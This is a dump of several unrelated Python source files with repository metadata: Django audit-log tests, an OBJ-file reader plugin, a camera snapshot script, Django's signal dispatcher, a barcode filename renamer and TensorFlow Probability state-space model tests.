] | 15 | 2019-09-30T05:40:20.000Z | 2022-02-17T19:28:41.000Z | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
] | 23 | 2019-02-18T10:50:10.000Z | 2022-01-06T07:53:18.000Z | # -*- coding: utf-8 -*-
import json
import re
from django.test import TestCase, override_settings
from django.urls import reverse
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
import bs4
from test_app.models import TestModel, TestForeignKey, TestM2M
from easyaudit.models import CRUDEvent
from easyaudit.middleware.easyaudit import set_current_user, clear_request
# Throw-away credentials used by the test cases below to create and log
# in regular and admin accounts.
TEST_USER_EMAIL = 'joe@example.com'
TEST_USER_PASSWORD = 'password'
TEST_ADMIN_EMAIL = 'admin@example.com'
TEST_ADMIN_PASSWORD = 'password'
@override_settings(TEST=True)
class TestAuditModels(TestCase):
    """CRUDEvent records should be written for creates and updates of
    audited models, including FK and M2M field serialization."""

    def test_create_model(self):
        # Creating an instance logs exactly one CRUDEvent whose JSON
        # snapshot matches the saved field values.
        obj = TestModel.objects.create()
        self.assertEqual(obj.id, 1)
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        self.assertEqual(1, crud_event_qs.count())
        crud_event = crud_event_qs[0]
        data = json.loads(crud_event.object_json_repr)[0]
        self.assertEqual(data['fields']['name'], obj.name)

    def test_fk_model(self):
        # Foreign keys are serialized as the related object's primary key.
        obj = TestModel.objects.create()
        obj_fk = TestForeignKey(name='test', test_fk=obj)
        obj_fk.save()
        crud_event = CRUDEvent.objects.filter(object_id=obj_fk.id, content_type=ContentType.objects.get_for_model(obj_fk))[0]
        data = json.loads(crud_event.object_json_repr)[0]
        self.assertEqual(data['fields']['test_fk'], obj.id)

    def test_m2m_model(self):
        # M2M fields are serialized as a list of related primary keys.
        obj = TestModel.objects.create()
        obj_m2m = TestM2M(name='test')
        obj_m2m.save()
        obj_m2m.test_m2m.add(obj)
        crud_event = CRUDEvent.objects.filter(object_id=obj_m2m.id, content_type=ContentType.objects.get_for_model(obj_m2m))[0]
        data = json.loads(crud_event.object_json_repr)[0]
        self.assertEqual(data['fields']['test_m2m'], [obj.id])

    @override_settings(DJANGO_EASY_AUDIT_CRUD_EVENT_NO_CHANGED_FIELDS_SKIP=True)
    def test_update_skip_no_changed_fields(self):
        # With the skip setting on, a real field change is still logged
        # and the changed field name is recorded.
        obj = TestModel.objects.create()
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        self.assertEqual(1, crud_event_qs.count())
        obj.name = 'changed name'
        obj.save()
        self.assertEqual(2, crud_event_qs.count())
        last_change = crud_event_qs.first()
        self.assertIn('name', last_change.changed_fields)

    def test_update(self):
        # Default settings: a field change produces a second event with
        # the changed field recorded.
        obj = TestModel.objects.create()
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        self.assertEqual(1, crud_event_qs.count())
        obj.name = 'changed name'
        obj.save()
        self.assertEqual(2, crud_event_qs.count())
        last_change = crud_event_qs.first()
        self.assertIn('name', last_change.changed_fields)

    @override_settings(DJANGO_EASY_AUDIT_CRUD_EVENT_NO_CHANGED_FIELDS_SKIP=True)
    def test_fake_update_skip_no_changed_fields(self):
        # With the skip setting on, saving with no field changes must NOT
        # produce a second event.
        obj = TestModel.objects.create()
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        obj.save()
        self.assertEqual(1, crud_event_qs.count())

    def test_fake_update(self):
        # Default settings: even a no-op save produces a second event.
        obj = TestModel.objects.create()
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        obj.save()
        self.assertEqual(2, crud_event_qs.count())
@override_settings(TEST=True)
class TestMiddleware(TestCase):
    """The easyaudit middleware should attach the acting user (or None)
    to CRUDEvents, both via requests and via manual user management."""

    def _setup_user(self, email, password):
        # Create and persist a regular user account.
        user = User(username=email)
        user.set_password(password)
        user.save()
        return user

    def _log_in_user(self, email, password):
        # Log the test client in and assert the login succeeded.
        login = self.client.login(username=email, password=password)
        self.assertTrue(login)

    def test_middleware_logged_in(self):
        # An object created during an authenticated request is attributed
        # to the logged-in user.
        user = self._setup_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
        self._log_in_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
        create_obj_url = reverse("test_app:create-obj")
        self.client.post(create_obj_url)
        self.assertEqual(TestModel.objects.count(), 1)
        obj = TestModel.objects.all()[0]
        crud_event = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))[0]
        self.assertEqual(crud_event.user, user)

    def test_middleware_not_logged_in(self):
        # An anonymous request yields an event with no user attached.
        create_obj_url = reverse("test_app:create-obj")
        self.client.post(create_obj_url)
        self.assertEqual(TestModel.objects.count(), 1)
        obj = TestModel.objects.all()[0]
        crud_event = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))[0]
        self.assertEqual(crud_event.user, None)

    def test_manual_set_user(self):
        # set_current_user() attributes subsequent events to that user;
        # clear_request() reverts to no attribution.
        user = self._setup_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
        # set user/request
        set_current_user(user)
        obj = TestModel.objects.create()
        self.assertEqual(obj.id, 1)
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        self.assertEqual(crud_event_qs.count(), 1)
        crud_event = crud_event_qs[0]
        self.assertEqual(crud_event.user, user)
        # clear request
        clear_request()
        obj = TestModel.objects.create()
        self.assertEqual(obj.id, 2)
        crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
        self.assertEqual(crud_event_qs.count(), 1)
        crud_event = crud_event_qs[0]
        self.assertEqual(crud_event.user, None)
@override_settings(TEST=True)
class TestAuditAdmin(TestCase):
    """Smoke tests for the easyaudit admin changelist pages."""

    def _setup_superuser(self, email, password):
        # Create a superuser able to access the admin site.
        # Fix: the original ignored the ``password`` argument and always
        # used TEST_ADMIN_PASSWORD; honor the parameter instead (all
        # existing callers pass TEST_ADMIN_PASSWORD, so behavior is
        # unchanged for them).
        admin = User.objects.create_superuser(email, email, password)
        admin.save()
        return admin

    def _log_in_user(self, email, password):
        # Log the test client in and assert the login succeeded.
        login = self.client.login(username=email, password=password)
        self.assertTrue(login)

    def _list_filters(self, content):
        """
        Extract filter names from the changelist sidebar of an admin page;
        example:
            <div id="changelist-filter">
                <h2>Filter</h2>
                <h3> By method </h3>
                ...
                <h3> By datetime </h3>
                ...
            </div>
        returns:
            ['method', 'datetime', ]
        """
        html = str(bs4.BeautifulSoup(content, features="html.parser").find(id="changelist-filter"))
        # Fix: raw string — '\s' in a non-raw literal is a deprecated
        # escape sequence (SyntaxWarning on newer Pythons).
        filters = re.findall(r'<h3>\s*By\s*(.*?)\s*</h3>', html)
        return filters

    def test_request_event_admin_no_users(self):
        # The RequestEvent changelist must render for a superuser even
        # when no audited users/events exist yet.
        self._setup_superuser(TEST_ADMIN_EMAIL, TEST_ADMIN_PASSWORD)
        self._log_in_user(TEST_ADMIN_EMAIL, TEST_ADMIN_PASSWORD)
        response = self.client.get(reverse('admin:easyaudit_requestevent_changelist'))
        self.assertEqual(200, response.status_code)
        filters = self._list_filters(response.content)
        print(filters)
| 39.662921 | 127 | 0.69051 |
6ecd936c99217102142dce8b9883e9ea20b6ffad | 3,338 | py | Python | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | # -*- mode: python -*-
# objReader.py, a plugin to read point and face data from a Wavefront
# OBJ file # (a 3D-structures file format) - jiw 9 Oct 2020
# Ref: <https://www.fileformat.info/format/wavefrontobj/egff.htm>
# Usage: To incorporate this code into pypevue, in command line
# parameters or in an `=P` line of a script, say
# `Plugins=examples.objReader`. To tell it which .obj file to read,
# say `userPar2="f"` (replacing f with appropriate .obj file name).
# If no .obj file name is specified, name will default to box.obj.
# Limitation: This code handles v and f lines (specifying vertex and
# face data) that appear in .obj files (see Ref) and ignores others.
# Method: This replaces the `hookBack()` method (a `pass`) with code
# that reads data from a specified .obj file. It keeps vertex and
# face data locally (rather than adding it into pypevu's post or
# cylinder data structures). Then, for each face that was read in, it
# writes code for one 3D polyhedron. See following example.
# polyhedron(points=[[241.037, -77.8, -84.111], [240.731, -97.498,
# -80.509], [229.245, -87.185, -88.24]], faces=[[0, 1, 2]] ); . For
# this example, `f 3 4 2` appeared in an OBJ file. The coordinates of
# OBJ-file vertices 3, 4, and 2 are listed in the points[] array, in
# that order, so that the faces[] array can refer to them as points 0,
# 1, and 2.
from math import sqrt, pi, cos, sin, asin, atan2, degrees
from pypevue import ssq, sssq, rotate2, isTrue, Point
from pypevue import FunctionList as ref
from re import sub
#---------------------------------------------------------
def hookBack(fout):
    """Read vertex ('v') and face ('f') records from a Wavefront OBJ file
    and write one OpenSCAD polyhedron() per face to *fout*.

    The OBJ file name comes from ref.userPar2 (default 'box.obj').  Other
    OBJ record types are counted and reported as skipped.
    """
    # Is a file name given?
    fn = ref.userPar2 if ref.userPar2 else 'box.obj'
    fn = sub('^"|"$', '', fn) # Strip outer quotes if any
    verts = []
    faces = []
    with open(fn) as fin:
        lin = 0; skipped = []; nskipped = 0
        while (token := fin.readline()):
            lin += 1
            if token.startswith('v '): # vertex command
                x,y,z = [float(u) for u in token[2:].split()]
                verts.append(Point(x, y, z))
            elif token.startswith('f '): # face command
                f = []
                # Drop '/vt' and '/vn' sub-indices, keeping only the
                # vertex index of each 'v/vt/vn' corner reference.
                token = sub('/[/0-9]*', '', token)
                for u in token[2:].split():
                    f.append(int(u)-1) # Make list of corners of face
                faces.append(f)
            elif token.startswith('#') or token=='' or token=='\n':
                pass # ignore comments and empty lines
            else:
                #print (f"Skipping line {lin} of OBJ file: {token}")
                nskipped += 1
                if len(skipped) < 34:
                    skipped.append(lin)
    # Report unhandled record types (at most 34 line numbers listed).
    print (f"Skipped {nskipped} lines (#{' '.join(str(i) for i in skipped)}...) of the {lin} lines in OBJ file")
    nverts = len(verts)
    # Scale the vertices
    for i in range(nverts):
        verts[i].scale(ref.SF)
    # Write OpenSCAD code for faces
    for f in faces:
        pl = ', '.join(f'[{verts[i]}]' for i in f)
        fout.write(f'polyhedron(points=[{pl}], ')
        pl = ', '.join(str(i) for i in range(len(f)))
        fout.write(f'faces=[[{pl}]] );\n')
#---------------------------------------------------------
def tell():
    """Expose this plugin's hook implementations to the pypevue framework."""
    return (hookBack,)
#---------------------------------------------------------
| 43.350649 | 112 | 0.560216 |
2dc97bd65ca13d5602d89ca2614ac84eb9acf05b | 1,612 | py | Python | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | import cv2
import time
import sys
import os
def prepare_window():
    """Create, size and position the preview window; return its name."""
    title = "Save snapshots"
    cv2.namedWindow(title, cv2.WINDOW_NORMAL)
    cv2.resizeWindow(title, 1280, 720)
    cv2.moveWindow(title, 0, 0)
    cv2.setWindowTitle(title, title)
    return title
def save_snapshots():
    """Show live camera frames; SPACE saves a snapshot, 'q' quits.

    Frames come from a V4L2/GStreamer pipeline (Jetson-style nvvidconv
    chain).  Snapshots are written as images/mono/snapshot<N>.jpg with N
    counting up from 1 for the session.
    """
    name = "snapshot"
    folder = "images/mono/"
    video_capture = cv2.VideoCapture("v4l2src device=/dev/video3 ! video/x-raw,format=UYVY,width=1920,height=1080,framerate=30/1 ! nvvidconv ! video/x-raw(memory:NVMM), format=I420 ! nvvidconv ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw,format=(string)BGR ! appsink", cv2.CAP_GSTREAMER)
    window_name = prepare_window()
    # Create the output directory once.  The original code attempted this
    # twice (makedirs, then stat/mkdir) and swallowed every error with a
    # bare except; exist_ok covers the only expected failure.
    folder = os.path.dirname(folder)  # "images/mono"
    os.makedirs(folder, exist_ok=True)
    image_count = 1
    file_name = "%s/%s" % (folder, name)
    while True:
        ret, frame = video_capture.read()
        if ret:
            cv2.imshow(window_name, frame)
        # Poll the keyboard even when a frame was dropped, so 'q' still
        # quits; previously imshow(None) would raise on a failed read.
        key = cv2.waitKey(10)
        if key == ord('q'):
            break
        if key == ord(' ') and ret:
            print("Saving image ", image_count)
            cv2.imwrite("%s%d.jpg" % (file_name, image_count), frame)
            image_count += 1
    video_capture.release()
    cv2.destroyAllWindows()
def main():
    """Entry point: run the interactive snapshot loop, then report completion."""
    save_snapshots()
    print("Files saved")


if __name__ == "__main__":
    main()
| 25.1875 | 306 | 0.597395 |
4983f8f4278b37e9a14f021c48e3db015f42da33 | 11,712 | py | Python | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | 3 | 2015-09-26T13:33:07.000Z | 2020-03-08T07:34:38.000Z | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | null | null | null | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | 15 | 2016-01-08T14:28:41.000Z | 2019-04-19T08:33:31.000Z | import sys
import threading
import warnings
import weakref
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.inspect import func_accepts_kwargs
from django.utils.six.moves import range
if six.PY2:
from .weakref_backports import WeakMethod
else:
from weakref import WeakMethod
def _make_id(target):
if hasattr(target, '__func__'):
return (id(target.__self__), id(target.__func__))
return id(target)
# Identity key matching receivers registered with sender=None (any sender).
NONE_ID = _make_id(None)

# A marker for caching: stored in sender_receivers_cache to record "this
# sender has no receivers" without re-scanning the receiver list.
NO_RECEIVERS = object()
class Signal(object):
    """
    Base class for all signals

    Internal attributes:

        receivers
            { receiverkey (id) : weakref(receiver) }
    """

    def __init__(self, providing_args=None, use_caching=False):
        """
        Create a new signal.

        providing_args
            A list of the arguments this signal can pass along in a send() call.
        """
        self.receivers = []
        if providing_args is None:
            providing_args = []
        self.providing_args = set(providing_args)
        self.lock = threading.Lock()
        self.use_caching = use_caching
        # For convenience we create empty caches even if they are not used.
        # A note about caching: if use_caching is defined, then for each
        # distinct sender we cache the receivers that sender has in
        # 'sender_receivers_cache'. The cache is cleaned when .connect() or
        # .disconnect() is called and populated on send().
        self.sender_receivers_cache = weakref.WeakKeyDictionary() if use_caching else {}
        self._dead_receivers = False

    def connect(self, receiver, sender=None, weak=True, dispatch_uid=None):
        """
        Connect receiver to sender for signal.

        Arguments:

            receiver
                A function or an instance method which is to receive signals.
                Receivers must be hashable objects.

                If weak is True, then receiver must be weak referenceable.

                Receivers must be able to accept keyword arguments.

                If a receiver is connected with a dispatch_uid argument, it
                will not be added if another receiver was already connected
                with that dispatch_uid.

            sender
                The sender to which the receiver should respond. Must either be
                of type Signal, or None to receive events from any sender.

            weak
                Whether to use weak references to the receiver. By default, the
                module will attempt to use weak references to the receiver
                objects. If this parameter is false, then strong references will
                be used.

            dispatch_uid
                An identifier used to uniquely identify a particular instance of
                a receiver. This will usually be a string, though it may be
                anything hashable.
        """
        from django.conf import settings

        # If DEBUG is on, check that we got a good receiver
        if settings.configured and settings.DEBUG:
            assert callable(receiver), "Signal receivers must be callable."

            # Check for **kwargs
            if not func_accepts_kwargs(receiver):
                raise ValueError("Signal receivers must accept keyword arguments (**kwargs).")

        # The lookup key makes (receiver, sender) pairs unique; an explicit
        # dispatch_uid replaces the receiver's id in the key.
        if dispatch_uid:
            lookup_key = (dispatch_uid, _make_id(sender))
        else:
            lookup_key = (_make_id(receiver), _make_id(sender))

        if weak:
            ref = weakref.ref
            receiver_object = receiver
            # Check for bound methods: a plain weakref to a bound method dies
            # immediately, so wrap it in WeakMethod keyed on the instance.
            if hasattr(receiver, '__self__') and hasattr(receiver, '__func__'):
                ref = WeakMethod
                receiver_object = receiver.__self__
            if six.PY3:
                receiver = ref(receiver)
                weakref.finalize(receiver_object, self._remove_receiver)
            else:
                receiver = ref(receiver, self._remove_receiver)

        with self.lock:
            self._clear_dead_receivers()
            # for/else: append only if no existing entry has the same key.
            for r_key, _ in self.receivers:
                if r_key == lookup_key:
                    break
            else:
                self.receivers.append((lookup_key, receiver))
            self.sender_receivers_cache.clear()

    def disconnect(self, receiver=None, sender=None, weak=None, dispatch_uid=None):
        """
        Disconnect receiver from sender for signal.

        If weak references are used, disconnect need not be called. The receiver
        will be removed from dispatch automatically.

        Arguments:

            receiver
                The registered receiver to disconnect. May be none if
                dispatch_uid is specified.

            sender
                The registered sender to disconnect

            dispatch_uid
                the unique identifier of the receiver to disconnect
        """
        if weak is not None:
            warnings.warn("Passing `weak` to disconnect has no effect.",
                          RemovedInDjango20Warning, stacklevel=2)
        if dispatch_uid:
            lookup_key = (dispatch_uid, _make_id(sender))
        else:
            lookup_key = (_make_id(receiver), _make_id(sender))

        disconnected = False
        with self.lock:
            self._clear_dead_receivers()
            for index in range(len(self.receivers)):
                (r_key, _) = self.receivers[index]
                if r_key == lookup_key:
                    disconnected = True
                    del self.receivers[index]
                    break
            self.sender_receivers_cache.clear()
        return disconnected

    def has_listeners(self, sender=None):
        # True when at least one live receiver would be called for `sender`.
        return bool(self._live_receivers(sender))

    def send(self, sender, **named):
        """
        Send signal from sender to all connected receivers.

        If any receiver raises an error, the error propagates back through send,
        terminating the dispatch loop, so it is quite possible to not have all
        receivers called if a receiver raises an error.

        Arguments:

            sender
                The sender of the signal. Either a specific object or None.

            named
                Named arguments which will be passed to receivers.

        Returns a list of tuple pairs [(receiver, response), ... ].
        """
        responses = []
        if not self.receivers or self.sender_receivers_cache.get(sender) is NO_RECEIVERS:
            return responses

        for receiver in self._live_receivers(sender):
            response = receiver(signal=self, sender=sender, **named)
            responses.append((receiver, response))
        return responses

    def send_robust(self, sender, **named):
        """
        Send signal from sender to all connected receivers catching errors.

        Arguments:

            sender
                The sender of the signal. Can be any python object (normally one
                registered with a connect if you actually want something to
                occur).

            named
                Named arguments which will be passed to receivers. These
                arguments must be a subset of the argument names defined in
                providing_args.

        Return a list of tuple pairs [(receiver, response), ... ]. May raise
        DispatcherKeyError.

        If any receiver raises an error (specifically any subclass of
        Exception), the error instance is returned as the result for that
        receiver. The traceback is always attached to the error at
        ``__traceback__``.
        """
        responses = []
        if not self.receivers or self.sender_receivers_cache.get(sender) is NO_RECEIVERS:
            return responses

        # Call each receiver with whatever arguments it can accept.
        # Return a list of tuple pairs [(receiver, response), ... ].
        for receiver in self._live_receivers(sender):
            try:
                response = receiver(signal=self, sender=sender, **named)
            except Exception as err:
                # Python 2 exceptions lack __traceback__; attach it manually.
                if not hasattr(err, '__traceback__'):
                    err.__traceback__ = sys.exc_info()[2]
                responses.append((receiver, err))
            else:
                responses.append((receiver, response))
        return responses

    def _clear_dead_receivers(self):
        # Note: caller is assumed to hold self.lock.
        if self._dead_receivers:
            self._dead_receivers = False
            new_receivers = []
            for r in self.receivers:
                # Drop entries whose weakref target has been collected.
                if isinstance(r[1], weakref.ReferenceType) and r[1]() is None:
                    continue
                new_receivers.append(r)
            self.receivers = new_receivers

    def _live_receivers(self, sender):
        """
        Filter sequence of receivers to get resolved, live receivers.

        This checks for weak references and resolves them, then returning only
        live receivers.
        """
        receivers = None
        if self.use_caching and not self._dead_receivers:
            receivers = self.sender_receivers_cache.get(sender)
            # We could end up here with NO_RECEIVERS even if we do check this case in
            # .send() prior to calling _live_receivers() due to concurrent .send() call.
            if receivers is NO_RECEIVERS:
                return []
        if receivers is None:
            # Cache miss (or caching disabled): scan under the lock.
            with self.lock:
                self._clear_dead_receivers()
                senderkey = _make_id(sender)
                receivers = []
                for (receiverkey, r_senderkey), receiver in self.receivers:
                    if r_senderkey == NONE_ID or r_senderkey == senderkey:
                        receivers.append(receiver)
                if self.use_caching:
                    if not receivers:
                        self.sender_receivers_cache[sender] = NO_RECEIVERS
                    else:
                        # Note, we must cache the weakref versions.
                        self.sender_receivers_cache[sender] = receivers
        non_weak_receivers = []
        for receiver in receivers:
            if isinstance(receiver, weakref.ReferenceType):
                # Dereference the weak reference.
                receiver = receiver()
                if receiver is not None:
                    non_weak_receivers.append(receiver)
            else:
                non_weak_receivers.append(receiver)
        return non_weak_receivers

    def _remove_receiver(self, receiver=None):
        # Mark that the self.receivers list has dead weakrefs. If so, we will
        # clean those up in connect, disconnect and _live_receivers while
        # holding self.lock. Note that doing the cleanup here isn't a good
        # idea, _remove_receiver() will be called as side effect of garbage
        # collection, and so the call can happen while we are already holding
        # self.lock.
        self._dead_receivers = True
def receiver(signal, **kwargs):
    """
    A decorator for connecting receivers to signals. Used by passing in the
    signal (or list of signals) and keyword arguments to connect::

        @receiver(post_save, sender=MyModel)
        def signal_receiver(sender, **kwargs):
            ...

        @receiver([post_save, post_delete], sender=MyModel)
        def signals_receiver(sender, **kwargs):
            ...
    """
    def _decorator(func):
        # Normalize a single signal to a one-element sequence, then connect
        # the decorated function to each signal with the supplied options.
        signals = signal if isinstance(signal, (list, tuple)) else [signal]
        for sig in signals:
            sig.connect(func, **kwargs)
        return func
    return _decorator
| 36.714734 | 94 | 0.600239 |
a14feec9138e055cffa7aefb1365a269a7897a50 | 715 | py | Python | _background/Johann Rocholl's Source/Final/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | 1 | 2016-08-31T04:57:05.000Z | 2016-08-31T04:57:05.000Z | _background/Johann Rocholl's Source/Initial/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | null | null | null | _background/Johann Rocholl's Source/Initial/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | null | null | null | #!/usr/bin/env python
import sys
import re
import os
# UPC form: two 6-digit halves separated by a dash, then -, _ or . and a
# suffix, e.g. "123456-789012-rest".
UPC_REGEX = re.compile(r'(\d\d\d\d\d\d)-(\d\d\d\d\d\d)[-_\.](.*)')
# EAN form: 13 contiguous digits (1 + 6 + 6), then -, _ or . and a suffix.
EAN_REGEX = re.compile(r'(\d)(\d\d\d\d\d\d)(\d\d\d\d\d\d)[-_\.](.*)')
def rename(filename, parts):
    # Join the captured groups into the canonical dash-separated file name
    # and rename the file on disk, logging old => new.  (Python 2 script.)
    newname = '-'.join(parts)
    print filename, '=>', newname
    os.rename(filename, newname)
# Normalize barcode-named files given on the command line.  Bug fix: iterate
# sys.argv[1:] so the script name (argv[0]) is never treated as a candidate
# for renaming.
for filename in sys.argv[1:]:
    match = UPC_REGEX.match(filename)
    if match:
        parts = list(match.groups())
        # UPC halves may contain stray dashes; strip them before renaming.
        parts[0] = parts[0].replace('-', '')
        parts[1] = parts[1].replace('-', '')
        # UPC-A lacks the leading EAN digit; normalize by prefixing '0'.
        parts.insert(0, '0')
        rename(filename, parts)
        continue
    match = EAN_REGEX.match(filename)
    if match:
        rename(filename, match.groups())
        continue
| 23.833333 | 69 | 0.566434 |
8fca046d320282c5d3c69c7ecb010c01849f552e | 4,595 | py | Python | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Local Linear Trend State Space Model Tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.sts import LocalLinearTrendStateSpaceModel
tfl = tf.linalg
class _LocalLinearTrendStateSpaceModelTest(object):
  """Shared test bodies for LocalLinearTrendStateSpaceModel.

  Concrete subclasses provide `dtype` and `use_static_shape`, so each test
  runs under every dtype/shape regime.
  """

  def test_logprob(self):
    # Log-prob of a near-linear series must match the precomputed reference.
    y = self._build_placeholder([1.0, 2.5, 4.3, 6.1, 7.8])

    ssm = LocalLinearTrendStateSpaceModel(
        num_timesteps=5,
        level_scale=0.5,
        slope_scale=0.5,
        initial_state_prior=tfd.MultivariateNormalDiag(
            scale_diag=self._build_placeholder([1., 1.])))

    lp = ssm.log_prob(y[..., np.newaxis])
    expected_lp = -5.801624298095703
    self.assertAllClose(self.evaluate(lp), expected_lp)

  def test_stats(self):
    # Build a model with expected initial loc 0 and slope 1.
    level_scale = self._build_placeholder(1.0)
    slope_scale = self._build_placeholder(1.0)
    initial_state_prior = tfd.MultivariateNormalDiag(
        loc=self._build_placeholder([0, 1.]),
        scale_diag=self._build_placeholder([1., 1.]))

    ssm = LocalLinearTrendStateSpaceModel(
        num_timesteps=10,
        level_scale=level_scale,
        slope_scale=slope_scale,
        initial_state_prior=initial_state_prior)

    # In expectation, the process grows linearly.
    mean = self.evaluate(ssm.mean())
    self.assertAllClose(mean, np.arange(0, 10)[:, np.newaxis])

    # slope variance at time T is linear: T * slope_scale
    expected_variance = [1, 3, 8, 18, 35, 61, 98, 148, 213, 295]
    variance = self.evaluate(ssm.variance())
    self.assertAllClose(variance, np.array(expected_variance)[:, np.newaxis])

  def test_batch_shape(self):
    # Parameters with partially-overlapping batch shapes must broadcast to
    # the full batch shape in both the distribution and its samples.
    batch_shape = [4, 2]
    partial_batch_shape = [2]

    level_scale = self._build_placeholder(
        np.exp(np.random.randn(*partial_batch_shape)))
    slope_scale = self._build_placeholder(np.exp(np.random.randn(*batch_shape)))
    initial_state_prior = tfd.MultivariateNormalDiag(
        scale_diag=self._build_placeholder([1., 1.]))

    ssm = LocalLinearTrendStateSpaceModel(
        num_timesteps=10,
        level_scale=level_scale,
        slope_scale=slope_scale,
        initial_state_prior=initial_state_prior)
    self.assertAllEqual(self.evaluate(ssm.batch_shape_tensor()), batch_shape)

    y = ssm.sample()
    self.assertAllEqual(self.evaluate(tf.shape(input=y))[:-2], batch_shape)

  def _build_placeholder(self, ndarray):
    """Convert a numpy array to a TF placeholder.

    Args:
      ndarray: any object convertible to a numpy array via `np.asarray()`.

    Returns:
      placeholder: a TensorFlow `placeholder` with default value given by the
      provided `ndarray`, dtype given by `self.dtype`, and shape specified
      statically only if `self.use_static_shape` is `True`.
    """
    ndarray = np.asarray(ndarray).astype(self.dtype)
    return tf1.placeholder_with_default(
        input=ndarray, shape=ndarray.shape if self.use_static_shape else None)
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestStaticShape32(
    test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
  """Runs the shared tests with float32 and statically-known shapes."""
  dtype = np.float32
  use_static_shape = True
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestDynamicShape32(
    test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
  """Runs the shared tests with float32 and dynamic (unknown) shapes."""
  dtype = np.float32
  use_static_shape = False
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestStaticShape64(
    test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
  """Runs the shared tests with float64 and statically-known shapes."""
  dtype = np.float64
  use_static_shape = True
if __name__ == "__main__":
  # Discover and run every test case defined in this module.
  tf.test.main()
| 34.037037 | 80 | 0.730141 |
38475ef893a1c44e06196ce0a6f90d88bf15a314 | 2,687 | py | Python | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
